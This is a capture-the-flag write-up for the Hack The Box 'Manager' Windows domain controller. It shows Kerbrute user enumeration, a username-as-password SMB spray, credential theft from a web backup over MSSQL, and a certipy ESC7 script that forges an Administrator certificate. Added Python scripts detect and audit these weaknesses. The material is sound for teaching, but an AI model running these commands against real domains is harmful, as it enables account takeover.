# Manager

{% embed url="<https://app.hackthebox.com/machines/Manager>" %}

The following post by 0xb0b is licensed under [CC BY 4.0<img src="https://mirrors.creativecommons.org/presskit/icons/cc.svg?ref=chooser-v1" alt="" data-size="line"><img src="https://mirrors.creativecommons.org/presskit/icons/by.svg?ref=chooser-v1" alt="" data-size="line">](http://creativecommons.org/licenses/by/4.0/?ref=chooser-v1)

***

## Recon

The target host has multiple open ports that indicate a Windows environment: DNS, a Microsoft IIS web server, Active Directory LDAP, Kerberos, Microsoft SQL Server 2019, RPC services, and others. The target is a domain controller, and the Nmap scan also reveals the domain and computer name:

`manager.htb`

`dc01.manager.htb`

```bash
ports=$(nmap -p- --min-rate=1000 -T4 manager.htb | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed 's/,$//')

nmap -sC -sV -p$ports manager.htb
```

```
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-03-16 08:38 EDT
Nmap scan report for manager.htb (10.129.120.237)
Host is up (0.029s latency).

PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
80/tcp    open  http          Microsoft IIS httpd 10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Manager
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-03-16 19:38:37Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: manager.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2024-03-16T19:40:06+00:00; +6h59m50s from scanner time.
| ssl-cert: Subject: commonName=dc01.manager.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc01.manager.htb
| Not valid before: 2023-07-30T13:51:28
|_Not valid after:  2024-07-29T13:51:28
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: manager.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2024-03-16T19:40:06+00:00; +6h59m50s from scanner time.
| ssl-cert: Subject: commonName=dc01.manager.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc01.manager.htb
| Not valid before: 2023-07-30T13:51:28
|_Not valid after:  2024-07-29T13:51:28
1433/tcp  open  ms-sql-s      Microsoft SQL Server 2019 15.00.2000.00; RTM
| ms-sql-info: 
|   10.129.120.237:1433: 
|     Version: 
|       name: Microsoft SQL Server 2019 RTM
|       number: 15.00.2000.00
|       Product: Microsoft SQL Server 2019
|       Service pack level: RTM
|       Post-SP patches applied: false
|_    TCP port: 1433
| ms-sql-ntlm-info: 
|   10.129.120.237:1433: 
|     Target_Name: MANAGER
|     NetBIOS_Domain_Name: MANAGER
|     NetBIOS_Computer_Name: DC01
|     DNS_Domain_Name: manager.htb
|     DNS_Computer_Name: dc01.manager.htb
|     DNS_Tree_Name: manager.htb
|_    Product_Version: 10.0.17763
|_ssl-date: 2024-03-16T19:40:06+00:00; +6h59m50s from scanner time.
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2024-03-16T19:30:16
|_Not valid after:  2054-03-16T19:30:16
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: manager.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc01.manager.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc01.manager.htb
| Not valid before: 2023-07-30T13:51:28
|_Not valid after:  2024-07-29T13:51:28
|_ssl-date: 2024-03-16T19:40:06+00:00; +6h59m50s from scanner time.
3269/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: manager.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2024-03-16T19:40:06+00:00; +6h59m50s from scanner time.
| ssl-cert: Subject: commonName=dc01.manager.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc01.manager.htb
| Not valid before: 2023-07-30T13:51:28
|_Not valid after:  2024-07-29T13:51:28
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf        .NET Message Framing
49667/tcp open  msrpc         Microsoft Windows RPC
49693/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49694/tcp open  msrpc         Microsoft Windows RPC
49695/tcp open  msrpc         Microsoft Windows RPC
49730/tcp open  msrpc         Microsoft Windows RPC
52872/tcp open  msrpc         Microsoft Windows RPC
52918/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 6h59m50s, deviation: 0s, median: 6h59m49s
| smb2-time: 
|   date: 2024-03-16T19:39:30
|_  start_date: N/A
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 95.94 second
```

When enumerating the website, nothing could be detected apart from static web pages.

<figure><img src="/files/fSAQDzlG0TmPbJqER0Nq" alt=""><figcaption></figcaption></figure>

We are probably dealing with an Active Directory challenge. We can enumerate valid users with Kerbrute, using the `xato-net-10-million-usernames.txt` wordlist from SecLists.

{% embed url="<https://github.com/ropnop/kerbrute>" %}

```bash
┌──(0xb0b㉿kali)-[~/Documents/htb-app/manager]
└─$ ./kerbrute_linux_amd64 userenum -d manager.htb /usr/share/wordlists/SecLists/Usernames/xato-net-10-million-usernames.txt --dc dc01.manager.htb
```

<figure><img src="/files/Yfdw8zUzMP1WObucoVeE" alt=""><figcaption></figcaption></figure>

## Initial Foothold

We use the output to create a user list.

```bash
┌──(0xb0b㉿kali)-[~/Documents/htb-app/manager]
└─$ sed -n 's/.*:\s*\([^@]\+\)@manager\.htb.*/\1/p' kerbrute-results.txt > usernames.txt
```

{% code title="usernames.txt" %}

```
ryan
guest
cheng
raven
administrator
Ryan
Raven
operator
Guest
Administrator
Cheng
jinwoo
RYAN
RAVEN
GUEST
Operator
```

{% endcode %}

Next, we try a password spray against the SMB port with NetExec, using the username list as the password list as well, in case a user has set their username as their password. The `--no-brute` flag pairs each username only with the password at the same position in the list instead of trying every combination. We get a hit for the user `operator`.

```bash
┌──(0xb0b㉿kali)-[~/Documents/htb-app/manager]
└─$ nxc smb manager.htb -u usernames.txt -p usernames.txt --no-brute --continue-on-success
```

<figure><img src="/files/SCGmfjXkUZnsqMFInd6d" alt=""><figcaption></figcaption></figure>
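Both steps so far, the Kerbrute user enumeration and the SMB password spray, leave a distinctive footprint on the domain controller that can be picked up from the Security log alone. The following Python script is an added example, not part of the original writeup: it runs over constructed, SIEM-style JSON event records (the field names `ts`, `event_id`, `status`, `account` and `source_ip` are this script's own flattening, not Windows' native XML names) and flags (a) Kerberos user enumeration as a burst of 4768 events with result 0x6 (KDC_ERR_C_PRINCIPAL_UNKNOWN) for many distinct accounts from one source, and (b) password spraying as many distinct accounts failing authentication (4625, 4771 with 0x18, or 4776 with 0xC000006A) from one source with only one or two attempts each. Thresholds are deliberately low to fit the sample data.

```python
"""Flag Kerberos user enumeration and password spraying in Windows Security events.

Added example, not part of the original writeup. The records below are constructed
to look like a flattened SIEM export; the field names are this script's own.
"""
import json
from collections import Counter, defaultdict
from datetime import datetime, timedelta

# Constructed sample: one JSON record per line, as a SIEM might export them.
SAMPLE_LOG = "\n".join(
    # TGT requests for non-existent accounts (4768, status 0x6 = KDC_ERR_C_PRINCIPAL_UNKNOWN)
    [json.dumps({"ts": f"2024-03-16T19:40:{i:02d}", "event_id": 4768, "status": "0x6",
                 "account": name, "source_ip": "10.10.14.5"})
     for i, name in enumerate(["aaron", "abby", "abe", "adam", "admin2", "agnes",
                               "alan", "albert", "alex", "alice", "amy", "andy"])]
    # one mistyped name from a workstation: benign noise, must not be flagged
    + [json.dumps({"ts": "2024-03-16T19:41:10", "event_id": 4768, "status": "0x6",
                   "account": "cheng2", "source_ip": "10.10.20.7"})]
    # logon failures for many distinct accounts, one try each (spray pattern)
    + [json.dumps({"ts": f"2024-03-16T19:45:{i:02d}", "event_id": 4625, "status": "0xc000006a",
                   "account": name, "source_ip": "10.10.14.5"})
       for i, name in enumerate(["ryan", "cheng", "raven", "administrator", "jinwoo",
                                 "guest", "operator2", "svc_backup"])]
    # one user failing three times: a forgotten password, not a spray
    + [json.dumps({"ts": f"2024-03-16T19:46:{i:02d}", "event_id": 4625, "status": "0xc000006a",
                   "account": "bob", "source_ip": "10.10.20.7"}) for i in range(3)]
)

# (event id, status) pairs that mean "wrong password" on a DC
FAILED_AUTH = {
    (4625, "0xc000006a"),  # logon failure: bad password
    (4771, "0x18"),        # Kerberos pre-auth failed: bad password
    (4776, "0xc000006a"),  # NTLM credential validation: bad password
}


def load_events(text):
    """Parse JSON lines into dicts with a real datetime and a normalised status."""
    events = []
    for line in text.splitlines():
        rec = json.loads(line)
        rec["ts"] = datetime.fromisoformat(rec["ts"])
        rec["status"] = rec["status"].lower()
        events.append(rec)
    return events


def bursts_by_source(events, keep, window, min_accounts):
    """Return {source_ip: sorted accounts} for every source whose `keep` events
    touch at least `min_accounts` distinct accounts inside some `window`."""
    per_source = defaultdict(list)
    for e in events:
        if keep(e):
            per_source[e["source_ip"]].append(e)
    flagged = {}
    for src, evs in per_source.items():
        evs.sort(key=lambda e: e["ts"])
        in_window = Counter()          # accounts seen in the current sliding window
        lo = 0
        for hi, e in enumerate(evs):
            in_window[e["account"]] += 1
            while evs[hi]["ts"] - evs[lo]["ts"] > window:
                in_window[evs[lo]["account"]] -= 1
                if in_window[evs[lo]["account"]] == 0:
                    del in_window[evs[lo]["account"]]
                lo += 1
            if len(in_window) >= min_accounts:
                flagged[src] = sorted({x["account"] for x in evs})
                break
    return flagged


def detect_user_enumeration(events, window=timedelta(minutes=5), min_accounts=5):
    """Kerbrute-style enumeration: a burst of TGT requests for unknown principals."""
    return bursts_by_source(events, lambda e: e["event_id"] == 4768 and e["status"] == "0x6",
                            window, min_accounts)


def detect_password_spray(events, window=timedelta(minutes=10), min_accounts=5, max_per_account=2):
    """Spray: many distinct accounts, few attempts each, from a single source."""
    hits = bursts_by_source(events, lambda e: (e["event_id"], e["status"]) in FAILED_AUTH,
                            window, min_accounts)
    result = {}
    for src, accounts in hits.items():
        tries = Counter(e["account"] for e in events
                        if e["source_ip"] == src and (e["event_id"], e["status"]) in FAILED_AUTH)
        if max(tries.values()) <= max_per_account:   # brute force of one account is a different alert
            result[src] = accounts
    return result


if __name__ == "__main__":
    evs = load_events(SAMPLE_LOG)
    print("enumeration:", detect_user_enumeration(evs))
    print("spray:", detect_password_spray(evs))
```

Two practical notes: the 4768 failures only exist if the "Audit Kerberos Authentication Service" subcategory is enabled on the domain controllers, and the single hit the spray produced here (`operator:operator`) shows up as a successful logon, so a detection keyed on failures catches the spray around it rather than the hit itself; correlating a success from a source that was just flagged is the natural follow-up.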

Let's see if we can use the credentials found to operate other services in addition to SMB. We can log in to the MSSQL service.

```bash
┌──(0xb0b㉿kali)-[~/Documents/htb-app/manager]
└─$ mssqlclient.py manager.htb/operator:operator@manager.htb -windows-auth
```

<figure><img src="/files/nlcn7VhHXttQWJzOEWLN" alt=""><figcaption></figcaption></figure>

We can use `xp_dirtree` to list the folders and files on the system. In the `wwwroot` folder, we find the `web.config` and a backup zip.

```sql
EXEC xp_dirtree 'C:\inetpub\wwwroot', 1, 1;
```

<figure><img src="/files/zxq5P4BPCcvcFY4BVAA5" alt=""><figcaption></figcaption></figure>

Unfortunately, the `web.config`, which is a common location for stored credentials, cannot be retrieved directly. The backup zip, however, can.

<figure><img src="/files/9crgqHtR40nWXlgXTHwW" alt=""><figcaption></figcaption></figure>

In the backup, we find an old config, and this contains the credentials for the user `raven`.

<figure><img src="/files/4jade5nLG8tWz8d0tQOt" alt=""><figcaption></figcaption></figure>
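The backup found here is the textbook case of a file that should never sit in a served directory, combined with credentials stored in plaintext in a `web.config`. The following Python script is an added example, not part of the writeup: it walks a web root, reports backup archives and stale config copies that a client could fetch by URL, opens zip archives to look for config files inside them, and flags `password=`/`pwd=` values in connection strings (reporting only the key name, never the value). It builds its own constructed sample web root in a temporary directory, so every file name and password in it is invented for the demonstration.

```python
"""Audit a web root for backup archives and plaintext connection-string credentials.

Added example, not from the writeup. The sample web root is constructed in a temp dir.
"""
import re
import tempfile
import zipfile
from pathlib import Path

# File types that have no business being served from a web root.
BACKUP_SUFFIXES = {".zip", ".bak", ".old", ".orig", ".rar", ".7z", ".tar", ".gz"}
# Config file names whose contents typically carry connection strings.
CONFIG_NAMES = {"web.config", "appsettings.json", "connectionstrings.config"}
# password= / pwd= inside a connection string; DPAPI-encrypted sections do not match.
CRED_RE = re.compile(r'\b(password|pwd)\s*=\s*"?([^;"\s]+)', re.I)

# Constructed config body; the password value is filled in per sample file.
WEB_CONFIG = """<configuration>
  <connectionStrings>
    <add name="Site" connectionString="Server=dc01;Database=app;User Id=svc_web;Password={pw};" />
  </connectionStrings>
</configuration>
"""


def looks_like_config(name):
    # web.config, web.config.old, web.config.bak, ... all count
    low = name.lower()
    return low in CONFIG_NAMES or low.startswith("web.config")


def scan_text(origin, text, findings):
    # Report which key leaked, never the value itself.
    for m in CRED_RE.finditer(text):
        findings.append(("plaintext-credential", origin, m.group(1).lower()))


def audit_webroot(root):
    """Return sorted (kind, location, detail) tuples for a web root directory."""
    root = Path(root)
    findings = []
    for path in root.rglob("*"):
        if not path.is_file():
            continue
        rel = path.relative_to(root).as_posix()
        if path.suffix.lower() in BACKUP_SUFFIXES:
            # Anything here is reachable by URL and should not exist in the served tree.
            findings.append(("backup-in-webroot", rel, ""))
            if zipfile.is_zipfile(path):
                with zipfile.ZipFile(path) as zf:
                    for member in zf.namelist():
                        if looks_like_config(Path(member).name):
                            text = zf.read(member).decode("utf-8", "replace")
                            scan_text(f"{rel}:{member}", text, findings)
            elif looks_like_config(path.name):          # e.g. web.config.bak
                scan_text(rel, path.read_text(errors="replace"), findings)
        elif looks_like_config(path.name):
            # IIS hides web.config from clients, but a plaintext password in it
            # still ends up in every backup copy of the site.
            scan_text(rel, path.read_text(errors="replace"), findings)
    return sorted(findings)


def build_sample_webroot():
    """Create a constructed web root in a temp dir and return its path."""
    root = Path(tempfile.mkdtemp(prefix="webroot-"))
    (root / "index.html").write_text("<html><body>static site</body></html>")
    (root / "css").mkdir()
    (root / "css" / "site.css").write_text("body { margin: 0 }")
    # live config with a plaintext password (constructed value)
    (root / "web.config").write_text(WEB_CONFIG.format(pw="Live-Pass-Constructed"))
    # the classic mistake: a site backup dropped into the served tree
    with zipfile.ZipFile(root / "website-backup-old.zip", "w") as zf:
        zf.writestr("old/index.html", "<html>old</html>")
        zf.writestr("old/web.config", WEB_CONFIG.format(pw="Old-Pass-Constructed"))
    return str(root)


if __name__ == "__main__":
    for finding in audit_webroot(build_sample_webroot()):
        print(*finding)
```

The two remediations the findings point at are keeping backups outside the served tree entirely, and not storing SQL passwords in `web.config` in the first place, either by using Windows authentication for the database connection or by encrypting the section with `aspnet_regiis -pe "connectionStrings"`, so that even a leaked copy of the file does not hand over a password.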

Using Evil-WinRM, we can log in as `raven` and find the user flag on the user's desktop.

<figure><img src="/files/3ASIULZDtdEVnd6Q0hxW" alt=""><figcaption></figcaption></figure>

## Privilege Escalation

We use Certipy to look for vulnerable AD CS configurations.

```bash
┌──(0xb0b㉿kali)-[~/Documents/htb-app/manager]
└─$ certipy find -u raven@manager -p '<REDACTED>' -dc-ip 10.129.120.237 -vulnerable
```

<figure><img src="/files/MxKDx26oHosfuOYx6N4S" alt=""><figcaption></figcaption></figure>

We see that `raven` has dangerous permissions on the CA that allow the ESC7 attack.

<figure><img src="/files/cZDOlMWeyLKJ4YToD1Da" alt=""><figcaption></figcaption></figure>

A detailed explanation of the attack can be found here:

{% embed url="<https://github.com/ly4k/Certipy#esc7>" %}
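From the defender's side, ESC7 comes down to two CA-level rights and one template state, all of which can be audited before anyone abuses them. The following Python script is an added example (not from the writeup and not Certipy's code); it takes a small, constructed description of a CA whose keys (`name`, `rights`, `enabled_templates`) are this script's own simplified layout rather than Certipy's JSON format, and reports principals outside an admin allow-list that hold ManageCA or ManageCertificates, plus the built-in SubCA template being enabled. The `harden` function applies the remediation to the same data.

```python
"""Audit a CA's permissions and template state for the ESC7 preconditions.

Added example. The input layout (name, rights, enabled_templates) is this
script's own simplification, not Certipy's JSON format.
"""
from copy import deepcopy

# Principals expected to administer the CA; anyone else with CA-level rights is a finding.
ADMIN_PRINCIPALS = {
    "MANAGER.HTB\\Administrators",
    "MANAGER.HTB\\Domain Admins",
    "MANAGER.HTB\\Enterprise Admins",
}

# Constructed CA description modelled on the situation in the writeup.
SAMPLE_CA = {
    "name": "manager-DC01-CA",
    "rights": {
        "ManageCA": sorted(ADMIN_PRINCIPALS) + ["MANAGER.HTB\\Raven"],
        "ManageCertificates": sorted(ADMIN_PRINCIPALS),
        "Enroll": ["MANAGER.HTB\\Authenticated Users"],
    },
    "enabled_templates": ["User", "Machine", "DomainController", "SubCA"],
}


def audit_ca(ca, admins=ADMIN_PRINCIPALS):
    """Return (severity, message) findings; an empty list means no ESC7 precondition."""
    findings = []
    rights = ca["rights"]
    for holder in rights.get("ManageCA", []):
        if holder not in admins:
            # ManageCA lets the holder add officers (ManageCertificates) and enable templates
            findings.append(("high", f"{holder} holds ManageCA on {ca['name']}: "
                                     "can grant itself ManageCertificates and enable templates"))
    for holder in rights.get("ManageCertificates", []):
        if holder not in admins:
            # a certificate officer can issue pending or denied requests
            findings.append(("high", f"{holder} holds ManageCertificates on {ca['name']}: "
                                     "can issue pending or denied requests"))
    if "SubCA" in ca.get("enabled_templates", []):
        # SubCA lets the enrollee supply the subject; combined with an officer,
        # a denied request carrying a foreign UPN can still be issued
        findings.append(("medium", f"SubCA template is enabled on {ca['name']}: "
                                   "the enrollee supplies the subject, so an officer can issue "
                                   "a denied request carrying any UPN"))
    return findings


def harden(ca, admins=ADMIN_PRINCIPALS):
    """Remediation on the same data: strip non-admin CA rights and disable SubCA."""
    fixed = deepcopy(ca)
    for right in ("ManageCA", "ManageCertificates"):
        fixed["rights"][right] = [p for p in fixed["rights"].get(right, []) if p in admins]
    fixed["enabled_templates"] = [t for t in fixed.get("enabled_templates", []) if t != "SubCA"]
    return fixed


if __name__ == "__main__":
    for severity, message in audit_ca(SAMPLE_CA):
        print(f"[{severity}] {message}")
    print("after hardening:", audit_ca(harden(SAMPLE_CA)))
```

On a real CA the rights come from the CA's security descriptor (the Security tab in `certsrv.msc`, or the Certipy `find` output the author used above); the allow-list is the part to adapt to your environment, and any change to it is exactly what the CA audit events for changed security settings and changed certificate manager settings should be alerting on.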

To run the attack, we put the commands in a simple script, since they have to be issued in quick succession. You have to set the password, and if requests have already been made against the CA, `REQUEST_ID` has to be adjusted to the ID that the request step reports.

{% code title="esc7.sh" lineNumbers="true" %}

```bash
#!/bin/bash

# Set variables
CA='manager-DC01-CA'
USERNAME='raven@manager.htb'
PASSWORD='REDACTED'
TARGET='manager.htb'
REQUEST_ID='13'

# Command 1: Add officer
certipy ca -ca "$CA" -add-officer raven -username "$USERNAME" -password "$PASSWORD" &&
# Command 2: Enable template
certipy ca -ca "$CA" -enable-template SubCA -username "$USERNAME" -password "$PASSWORD" &&
# Command 3: Request
certipy req -username "$USERNAME" -password "$PASSWORD" -ca "$CA" -target "$TARGET" -template SubCA -upn administrator@manager.htb &&
# Command 4: Issue request
certipy ca -ca "$CA" -issue-request "$REQUEST_ID" -username "$USERNAME" -password "$PASSWORD" &&
# Command 5: Retrieve
certipy req -username "$USERNAME" -password "$PASSWORD" -ca "$CA" -target "$TARGET" -retrieve "$REQUEST_ID"
```

{% endcode %}

By executing the script, we get the Administrator certificate.

<figure><img src="/files/KwxbLXeuS7CGYTovd8b0" alt=""><figcaption></figcaption></figure>

With that, we can retrieve the Administrator's NT hash. The next commands have to be chained in quick succession and may still fail: the Nmap scan showed a clock skew of almost seven hours, and Kerberos rejects requests whose timestamp is outside a small tolerance window (five minutes by default), so we synchronize our clock with the DC first.

```bash
┌──(0xb0b㉿kali)-[~/Documents/htb-app/manager/certipy]
└─$ sudo ntpdate -s manager.htb && certipy auth -pfx administrator.pfx
```

<figure><img src="/files/5uRp4XQDFPyJUbIpU0qd" alt=""><figcaption></figcaption></figure>

We use Evil-WinRM to log in as the Administrator by passing the retrieved hash. On the Administrator's desktop, we find the final flag.

<figure><img src="/files/YjoRwfRhXII4N3uazIzy" alt=""><figcaption></figcaption></figure>
